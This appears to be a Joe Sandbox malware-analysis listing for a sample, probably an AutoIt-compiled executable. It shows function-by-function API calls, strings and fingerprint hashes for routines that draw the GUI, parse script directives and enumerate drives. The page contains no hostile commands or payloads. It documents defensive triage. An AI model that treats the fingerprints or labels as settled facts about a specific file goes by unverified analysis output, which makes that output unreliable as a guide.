Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: BuffCharUpperVisibleWindow
String ID: ADDSTRING$CHECK$CURRENTTAB$DELSTRING$EDITPASTE$FINDSTRING$GETCURRENTCOL$GETCURRENTLINE$GETCURRENTSELECTION$GETLINE$GETLINECOUNT$GETSELECTED$HIDEDROPDOWN$ISCHECKED$ISENABLED$ISVISIBLE$SELECTSTRING$SENDCOMMANDID$SETCURRENTSELECTION$SHOWDROPDOWN$TABLEFT$TABRIGHT$UNCHECK
API String ID: 4105515805-45149045
Opcode ID: 12b64cc26f33c5c363ffc391cb410adcabf6d3821359e1fa74691af57bd6f0a3
Instruction ID: d31c010876f1cd3db2935a11f40fa9cab0c52cd2ce9ea9f49d35db958583f11c
Opcode Fuzzy Hash: 12b64cc26f33c5c363ffc391cb410adcabf6d3821359e1fa74691af57bd6f0a3
Instruction Fuzzy Hash: 5FD18070214305DFCB04EF10C459A7E77A1EF95394F14845CFA869B3A2DB29EE4ACB92

Function 007FA5DA Relevance: 49.8, APIs: 33, Instructions: 260COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 007FA630
GetSysColorBrush.USER32(0000000F), ref: 007FA661
GetSysColor.USER32(0000000F), ref: 007FA66D
SetBkColor.GDI32(?,000000FF), ref: 007FA687
SelectObject.GDI32(?,00000000), ref: 007FA696
InflateRect.USER32(?,000000FF,000000FF), ref: 007FA6C1
GetSysColor.USER32(00000010), ref: 007FA6C9
CreateSolidBrush.GDI32(00000000), ref: 007FA6D0
FrameRect.USER32(?,?,00000000), ref: 007FA6DF
DeleteObject.GDI32(00000000), ref: 007FA6E6
InflateRect.USER32(?,000000FE,000000FE), ref: 007FA731
FillRect.USER32(?,?,00000000), ref: 007FA763
GetWindowLongW.USER32(?,000000F0), ref: 007FA78E

Part of subcall function 007FA8CA: GetSysColor.USER32(00000012), ref: 007FA903
Part of subcall function 007FA8CA: SetTextColor.GDI32(?,?), ref: 007FA907
Part of subcall function 007FA8CA: GetSysColorBrush.USER32(0000000F), ref: 007FA91D
Part of subcall function 007FA8CA: GetSysColor.USER32(0000000F), ref: 007FA928
Part of subcall function 007FA8CA: GetSysColor.USER32(00000011), ref: 007FA945
Part of subcall function 007FA8CA: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FA953
Part of subcall function 007FA8CA: SelectObject.GDI32(?,00000000), ref: 007FA964
Part of subcall function 007FA8CA: SetBkColor.GDI32(?,00000000), ref: 007FA96D
Part of subcall function 007FA8CA: SelectObject.GDI32(?,?), ref: 007FA97A
Part of subcall function 007FA8CA: InflateRect.USER32(?,000000FF,000000FF), ref: 007FA999
Part of subcall function 007FA8CA: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FA9B0
Part of subcall function 007FA8CA: GetWindowLongW.USER32(00000000,000000F0), ref: 007FA9C5
Part of subcall function 007FA8CA: SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007FA9ED

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameMessageRoundSendSolid
String ID:
API String ID: 3521893082-0
Opcode ID: eaa2fb9f846ad6eeb657cef20d6b0a601acd6bf19562784469fcafc8742e4812
Instruction ID: 247a603c13a14a816edae0d9935e757ff2921e4c71d5a4c9a391607f6ac688c5
Opcode Fuzzy Hash: eaa2fb9f846ad6eeb657cef20d6b0a601acd6bf19562784469fcafc8742e4812
Instruction Fuzzy Hash: CD9180B1408305FFC7119F64DC08E6B7BA9FF48321F104A29FA66D62A0DB79D944CB56

Function 00772C18 Relevance: 49.5, APIs: 27, Strings: 1, Instructions: 486windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?,?), ref: 00772CA2
DeleteObject.GDI32(00000000), ref: 00772CE8
DeleteObject.GDI32(00000000), ref: 00772CF3
DestroyIcon.USER32(00000000,?,?,?), ref: 00772CFE
DestroyWindow.USER32(00000000,?,?,?), ref: 00772D09
SendMessageW.USER32(?,00001308,?,00000000), ref: 007AC43B
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 007AC474
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 007AC89D

Part of subcall function 00771B41: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00772036,?,00000000,?,?,?,?,007716CB,00000000,?), ref: 00771B9A

SendMessageW.USER32(?,00001053), ref: 007AC8DA
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 007AC8F1
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007AC907
ImageList_Destroy.COMCTL32(00000000,?,?), ref: 007AC912

Strings

0, xrefs: 007AC731

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Destroy$ImageList_MessageSendWindow$DeleteObject$IconInvalidateMoveRectRemove
String ID: 0
API String ID: 464785882-4108050209
Opcode ID: 387daf623c384c3329218807cf0fd4e85373cc948118ef3f1d562b885f232f85
Instruction ID: e9ed43066676236232100ebbd39bfe154689ed8eb3283daeeafd5ae6f2d4a168
Opcode Fuzzy Hash: 387daf623c384c3329218807cf0fd4e85373cc948118ef3f1d562b885f232f85
Instruction Fuzzy Hash: 9612A230600201EFDB16CF24C988B69B7E5FF96340F548669F559CB262CB39EC52CB61

Function 007E74AB Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 284windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 007E74DE
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 007E759D
SetRect.USER32(?,00000000,00000000,0000012C,00000064), ref: 007E75DB
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000006), ref: 007E75ED
CreateWindowExW.USER32(00000006,AutoIt v3,?,88C00000,?,?,?,?,00000000,00000000,00000000), ref: 007E7633
GetClientRect.USER32(00000000,?), ref: 007E763F
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000), ref: 007E7683
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 007E7692
GetStockObject.GDI32(00000011), ref: 007E76A2
SelectObject.GDI32(00000000,00000000), ref: 007E76A6
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?), ref: 007E76B6
GetDeviceCaps.GDI32(00000000,0000005A), ref: 007E76BF
DeleteDC.GDI32(00000000), ref: 007E76C8
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007E76F4
SendMessageW.USER32(00000030,00000000,00000001), ref: 007E770B
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,0000001E,00000104,00000014,00000000,00000000,00000000), ref: 007E7746
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 007E775A
SendMessageW.USER32(00000404,00000001,00000000), ref: 007E776B
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000037,00000500,00000032,00000000,00000000,00000000), ref: 007E779B
GetStockObject.GDI32(00000011), ref: 007E77A6
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 007E77B1
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,00000018,00000000,00000000,00000000,?,88C00000,?,?,?,?), ref: 007E77BB

Strings

msctls_progress32, xrefs: 007E773C
static, xrefs: 007E767D, 007E7795
AutoIt v3, xrefs: 007E762B
DISPLAY, xrefs: 007E7688

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: 2a2282b20767954db4b6d8f32dff553754ed0d6635767eebde5a60c37140c40b
Instruction ID: 7617a7664b84b04a433e3cf7175e8df55c4f0626c8bf758160b12e4dac280286
Opcode Fuzzy Hash: 2a2282b20767954db4b6d8f32dff553754ed0d6635767eebde5a60c37140c40b
Instruction Fuzzy Hash: FBA14071A41619BFEB14DBA4DC4AFAF7BA9EF48710F008114FA15E72E0DA74AD10CB64

Function 007DAD10 Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 186COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 007DAD1E
GetDriveTypeW.KERNEL32(?,007FFAC0,?,\\.\,007FF910), ref: 007DADFB
SetErrorMode.KERNEL32(00000000,007FFAC0,?,\\.\,007FF910), ref: 007DAF59

Strings

USB, xrefs: 007DAEF0
SSD, xrefs: 007DAE86
Fibre, xrefs: 007DAEE9
SCSI, xrefs: 007DAEC6
Removable, xrefs: 007DAE4D
Virtual, xrefs: 007DAF21
1394, xrefs: 007DAEDB
RAMDisk, xrefs: 007DAE25
PhysicalDrive, xrefs: 007DADA7
Unknown, xrefs: 007DAE1B, 007DAEBF
\\.\, xrefs: 007DAD70
RAID, xrefs: 007DAEF7
Fixed, xrefs: 007DAE43
CDROM, xrefs: 007DAE2F
Network, xrefs: 007DAE39
iSCSI, xrefs: 007DAEFE
MMC, xrefs: 007DAF1A
FileBackedVirtual, xrefs: 007DAF28
SATA, xrefs: 007DAF0C
ATAPI, xrefs: 007DAECD
SSA, xrefs: 007DAEE2
SAS, xrefs: 007DAF05
ATA, xrefs: 007DAED4

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 0d41a148b71a7e6534454d88073f8f54abb5f0822a2fd72e5c89cdfd8362f0cd
Instruction ID: 376e818f40b8065351349282a01ca2921f87a3bf7b51c573b04ef702fb9bfefc
Opcode Fuzzy Hash: 0d41a148b71a7e6534454d88073f8f54abb5f0822a2fd72e5c89cdfd8362f0cd
Instruction Fuzzy Hash: 0E5168B164A219FA8F00EB10D986CB973B1FB08750B2084ABE417E7391DE7DD981DB53

Function 007768DC Relevance: 44.0, APIs: 12, Strings: 13, Instructions: 275COMMON

Download Yara Rule

APIs

__wcsnicmp.LIBCMT ref: 00776931
__wcsnicmp.LIBCMT ref: 00776949
__wcsnicmp.LIBCMT ref: 00776961
__wcsnicmp.LIBCMT ref: 00776979
__wcsnicmp.LIBCMT ref: 00776991
__wcsnicmp.LIBCMT ref: 007769A9
__wcsnicmp.LIBCMT ref: 007769C1
__wcsnicmp.LIBCMT ref: 007769D5
__wcsnicmp.LIBCMT ref: 00776A16
__wcsnicmp.LIBCMT ref: 00776A2A
__wcsnicmp.LIBCMT ref: 00776A3E
__wcsnicmp.LIBCMT ref: 00776A52

Strings

Cannot parse #include, xrefs: 007AE3F0
#comments-end, xrefs: 00776A38
#pragma compile, xrefs: 0077692B
#comments-start, xrefs: 007769BB, 00776A10
#ce, xrefs: 00776A4C
#notrayicon, xrefs: 00776943
Bad directive syntax error, xrefs: 007AE31A
#include, xrefs: 007769A3
#requireadmin, xrefs: 0077695B
#OnAutoItStartRegister, xrefs: 00776973
Unterminated group of comments, xrefs: 007AE403
#cs, xrefs: 007769CF, 00776A24
#include-once, xrefs: 0077698B

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: __wcsnicmp
String ID: #OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
API String ID: 1038674560-86951937
Opcode ID: b7a70946c6bf2bcce682a7af38aeb2f82fbdc2b037c9f6f80aa8a94387dfdd86
Instruction ID: 27ab78d8557a304551407c1d840e767e9b3297ed2d8495df565b9bfdc4a6d6ca
Opcode Fuzzy Hash: b7a70946c6bf2bcce682a7af38aeb2f82fbdc2b037c9f6f80aa8a94387dfdd86
Instruction Fuzzy Hash: BC812BB1600605FACF10BB60EC46FBF37A8EF15750F04C125F909AA29AEB6CDE45C691

Function 007FA8CA Relevance: 39.2, APIs: 26, Instructions: 187windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 007FA903
SetTextColor.GDI32(?,?), ref: 007FA907
GetSysColorBrush.USER32(0000000F), ref: 007FA91D
GetSysColor.USER32(0000000F), ref: 007FA928
CreateSolidBrush.GDI32(?), ref: 007FA92D
GetSysColor.USER32(00000011), ref: 007FA945
CreatePen.GDI32(00000000,00000001,00743C00), ref: 007FA953
SelectObject.GDI32(?,00000000), ref: 007FA964
SetBkColor.GDI32(?,00000000), ref: 007FA96D
SelectObject.GDI32(?,?), ref: 007FA97A
InflateRect.USER32(?,000000FF,000000FF), ref: 007FA999
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007FA9B0
GetWindowLongW.USER32(00000000,000000F0), ref: 007FA9C5
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007FA9ED
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007FAA14
InflateRect.USER32(?,000000FD,000000FD), ref: 007FAA32
DrawFocusRect.USER32(?,?), ref: 007FAA3D
GetSysColor.USER32(00000011), ref: 007FAA4B
SetTextColor.GDI32(?,00000000), ref: 007FAA53
DrawTextW.USER32(?,00000000,000000FF,?,?), ref: 007FAA67
SelectObject.GDI32(?,007FA5FA), ref: 007FAA7E
DeleteObject.GDI32(?), ref: 007FAA89
SelectObject.GDI32(?,?), ref: 007FAA8F
DeleteObject.GDI32(?), ref: 007FAA94
SetTextColor.GDI32(?,?), ref: 007FAA9A
SetBkColor.GDI32(?,?), ref: 007FAAA4

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 9dced28ade77269903df81e3de9f54a98d7d73d5d15b857f2c260cd51edbf4b1
Instruction ID: 00242e65da828b411fde4f9ec741f87899d9c3db52f4c05a96903bdb04c2de5f
Opcode Fuzzy Hash: 9dced28ade77269903df81e3de9f54a98d7d73d5d15b857f2c260cd51edbf4b1
Instruction Fuzzy Hash: 64511DB1900208FFDF11DFA4DC48EAE7B79EF48320F118525FA15AB2A1DB799940DB94

Function 007F89D5 Relevance: 38.9, APIs: 21, Strings: 1, Instructions: 401windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00000158,000000FF,0000014E), ref: 007F8AC1
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F8AD2
CharNextW.USER32(0000014E), ref: 007F8B01
SendMessageW.USER32(?,0000014B,00000000,00000000), ref: 007F8B42
SendMessageW.USER32(?,00000158,000000FF,00000158), ref: 007F8B58
SendMessageW.USER32(?,0000014E,00000000,00000000), ref: 007F8B69
SendMessageW.USER32(?,000000C2,00000001,0000014E), ref: 007F8B86
SetWindowTextW.USER32(?,0000014E), ref: 007F8BD8
SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 007F8BEE
SendMessageW.USER32(?,00001002,00000000,?), ref: 007F8C1F
_memset.LIBCMT ref: 007F8C44
SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 007F8C8D
_memset.LIBCMT ref: 007F8CEC
SendMessageW.USER32(?,00001053,000000FF,?), ref: 007F8D16
SendMessageW.USER32(?,00001074,?,00000001), ref: 007F8D6E
SendMessageW.USER32(?,0000133D,?,?), ref: 007F8E1B
InvalidateRect.USER32(?,00000000,00000001), ref: 007F8E3D
GetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F8E87
SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 007F8EB4
DrawMenuBar.USER32(?), ref: 007F8EC3
SetWindowTextW.USER32(?,0000014E), ref: 007F8EEB

Strings

0, xrefs: 007F8E55

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
String ID: 0
API String ID: 1073566785-4108050209
Opcode ID: fb9f82f7915ddf8242d28dc35b1b84002c0e0e102af2bfc07bb6b518b26e90c7
Instruction ID: 02493ad6f0f1c88eba2243ee1881ac433536a9a958c06f9e7efa63c711ac9601
Opcode Fuzzy Hash: fb9f82f7915ddf8242d28dc35b1b84002c0e0e102af2bfc07bb6b518b26e90c7
Instruction Fuzzy Hash: 56E14D71900208EEDF609F64CC88AFE7BB9FF05710F108156FA25AA291DF788981DF61

Function 007F488F Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007F49CA
GetDesktopWindow.USER32 ref: 007F49DF
GetWindowRect.USER32(00000000), ref: 007F49E6
GetWindowLongW.USER32(?,000000F0), ref: 007F4A48
DestroyWindow.USER32(?), ref: 007F4A74
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007F4A9D
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007F4ABB
SendMessageW.USER32(?,00000439,00000000,00000030), ref: 007F4AE1
SendMessageW.USER32(?,00000421,?,?), ref: 007F4AF6
SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 007F4B09
IsWindowVisible.USER32(?), ref: 007F4B29
SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 007F4B44
SendMessageW.USER32(?,00000411,00000001,00000030), ref: 007F4B58
GetWindowRect.USER32(?,?), ref: 007F4B70
MonitorFromPoint.USER32(?,?,00000002), ref: 007F4B96
GetMonitorInfoW.USER32(00000000,?), ref: 007F4BB0
CopyRect.USER32(?,?), ref: 007F4BC7
SendMessageW.USER32(?,00000412,00000000), ref: 007F4C32

Strings

0, xrefs: 007F4975
tooltips_class32, xrefs: 007F4A96
(, xrefs: 007F4BA3

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 70574a7c0d0b0ed324014c0762ce2d47ae57f4fab3daca06aa71ada6feb9ab31
Instruction ID: 277a1eb3fee8ad9fb26b07613a6f03acdb390a74843dd623f11097b1b3802d52
Opcode Fuzzy Hash: 70574a7c0d0b0ed324014c0762ce2d47ae57f4fab3daca06aa71ada6feb9ab31
Instruction Fuzzy Hash: 35B16A71604340AFDB04DF64C888B6BBBE4FF88354F00891CF6999B2A1DB79E805CB56

Function 007727D9 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 286windowtimeCOMMON

Download Yara Rule

APIs

SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007728BC
GetSystemMetrics.USER32(00000007), ref: 007728C4
SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 007728EF
GetSystemMetrics.USER32(00000008), ref: 007728F7
GetSystemMetrics.USER32(00000004), ref: 0077291C
SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 00772939
AdjustWindowRectEx.USER32(000000FF,?,00000000,?), ref: 00772949
CreateWindowExW.USER32(?,AutoIt v3 GUI,?,?,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0077297C
SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 00772990
GetClientRect.USER32(00000000,000000FF), ref: 007729AE
GetStockObject.GDI32(00000011), ref: 007729CA
SendMessageW.USER32(00000000,00000030,00000000), ref: 007729D5

Part of subcall function 00772344: GetCursorPos.USER32(?), ref: 00772357
Part of subcall function 00772344: ScreenToClient.USER32(008357B0,?), ref: 00772374
Part of subcall function 00772344: GetAsyncKeyState.USER32(00000001), ref: 00772399
Part of subcall function 00772344: GetAsyncKeyState.USER32(00000002), ref: 007723A7

SetTimer.USER32(00000000,00000000,00000028,00771256), ref: 007729FC

Strings

AutoIt v3 GUI, xrefs: 00772974

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
String ID: AutoIt v3 GUI
API String ID: 1458621304-248962490
Opcode ID: 4a9560e2d472d1cbc49f78bf7732e35ecf68ea0a002bdeca9fc740ecabcb04b2
Instruction ID: 0f5def7a108d037adce5a5189f37bd7456bc4211dd41f596f66123378df7f8c4
Opcode Fuzzy Hash: 4a9560e2d472d1cbc49f78bf7732e35ecf68ea0a002bdeca9fc740ecabcb04b2
Instruction Fuzzy Hash: 0DB16E7160020AEFDF14DFA8DC45BAE7BB4FB48354F108229FA19E7291DB78A851CB54

Function 007AA8CB Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 211COMMONLIBRARYCODE

Download Yara Rule

APIs

_copy_environ.LIBCMT ref: 007AA92B
___wtomb_environ.LIBCMT ref: 007AA94D

Part of subcall function 00798B28: __getptd_noexit.LIBCMT ref: 00798B28

__malloc_crt.LIBCMT ref: 007AA975
__malloc_crt.LIBCMT ref: 007AA992
_free.LIBCMT ref: 007AA9C9
__recalloc_crt.LIBCMT ref: 007AAA02
__recalloc_crt.LIBCMT ref: 007AAA47
_strlen.LIBCMT ref: 007AAA73
__calloc_crt.LIBCMT ref: 007AAA7D
_strlen.LIBCMT ref: 007AAA8C
SetEnvironmentVariableA.KERNEL32(00000000,00000000,?,?,?,?,00000000,00000000), ref: 007AAABA
_free.LIBCMT ref: 007AAAD4
_free.LIBCMT ref: 007AAAE1
_free.LIBCMT ref: 007AAAF3
__invoke_watson.LIBCMT ref: 007AAB0D

Strings

{ny, xrefs: 007AA932
{ny, xrefs: 007AAAAD

Memory Dump Source

Source File: 00000000.00000002.1720553747.0000000000771000.00000020.00000001.01000000.00000003.sdmp, Offset: 00770000, based on PE: true

Associated: 00000000.00000002.1720542989.0000000000770000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.00000000007FF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720594170.0000000000824000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720626095.000000000082E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1720638917.0000000000837000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_770000_gKvjKMCUfq.jbxd

Similarity

API ID: _free$__malloc_crt__recalloc_crt_strlen$EnvironmentVariable___wtomb_environ__calloc_crt__getptd_noexit__invoke_watson_copy_environ
String ID: {ny${ny
API String ID: 884005220-275547986
Opcode ID: 344f48eb0ee10188e33ea2ff66a1bb5c811cd0dd1fe1e81b1c70dfd6c4a4cf0d
